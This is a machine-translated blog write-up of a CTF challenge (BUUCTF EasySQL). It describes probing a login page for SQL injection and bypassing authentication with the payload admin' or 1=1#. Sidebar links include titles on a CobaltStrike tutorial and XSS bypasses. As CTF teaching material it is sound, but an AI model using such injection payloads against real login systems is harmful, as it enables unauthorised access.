当前位置:网站首页>Buuctf question brushing notes - [geek challenge 2019] easysql 1
Buuctf question brushing notes - [geek challenge 2019] easysql 1
2022-07-06 03:03:00 【Always a teenager】
Continue today BUUCTF The topic , Today's solution [ Geek challenge 2019]EasySQL 1.
One 、 Basic information of the topic
Let's go to the link , Open the web site , The results are shown below :
Two 、 Their thinking
As can be seen from the above figure , Our target site is a login page . Combined with the topic information , We can guess that the problem is solved as SQL Injection direction .
We simply try the user name with single quotation marks at the user name admin’, The results are shown below :
As can be seen from the above figure , This is a simple error report SQL Inject .
Next , We try to add a after the user name just now #, Try to filter the following content , The results are shown below :
3、 ... and 、 Get flag
It is easy to analyze from the above attempts , The topic is very simple , Basically no filtering , We try to use universal password , user name admin’ or 1=1#, Password optional , Click to log in , The results are shown below :
As can be seen from the above figure , We successfully got the title flag.
Originality is not easy. , Reprint please explain the source :https://blog.csdn.net/weixin_40228200
边栏推荐
- js 正则过滤和增加富文本中图片前缀
- Solve 9 with C language × 9 Sudoku (personal test available) (thinking analysis)
- 纯Qt版中国象棋:实现双人对战、人机对战及网络对战
- 银行核心业务系统性能测试方法
- Installation and use tutorial of cobaltstrike-4.4-k8 modified version
- What is the investment value of iFLYTEK, which does not make money?
- QT release exe software and modify exe application icon
- 华为、H3C、思科命令对比,思维导图形式从基础、交换、路由三大方向介绍【转自微信公众号网络技术联盟站】
- Universal crud interface
- Single instance mode of encapsulating PDO with PHP in spare time
猜你喜欢
故障分析 | MySQL 耗尽主机内存一例分析
"Hands on learning in depth" Chapter 2 - preparatory knowledge_ 2.5 automatic differentiation_ Learning thinking and exercise answers
Web security SQL injection vulnerability (1)
A copy can also produce flowers
【Kubernetes 系列】一文学会Kubernetes Service安全的暴露应用
电机控制反Park变换和反Clarke变换公式推导
XSS challenges绕过防护策略进行 XSS 注入
【Kubernetes 系列】一文學會Kubernetes Service安全的暴露應用
Linear programming matlab
[Yunju entrepreneurial foundation notes] Chapter II entrepreneur test 19
随机推荐
07 单件(Singleton)模式
Technology sharing | what if Undo is too big
How does yyds dry inventory deal with repeated messages in the consumption process?
【Unity3D】GUI控件
微服务间通信
[Yunju entrepreneurial foundation notes] Chapter II entrepreneur test 19
Redis skip table
全国大学生信息安全赛创新实践赛初赛---misc(永恒的夜)
不赚钱的科大讯飞,投资价值该怎么看?
Microservice registration and discovery
主数据管理理论与实践
OCR文字識別方法綜述
解决:AttributeError: ‘str‘ object has no attribute ‘decode‘
2022工作中遇到的问题四
XSS challenges bypass the protection strategy for XSS injection
4. File modification
原型图设计
DDoS attacks - are we really at war?
Maturity of master data management (MDM)
[ruoyi] ztree custom icon (iconskin attribute)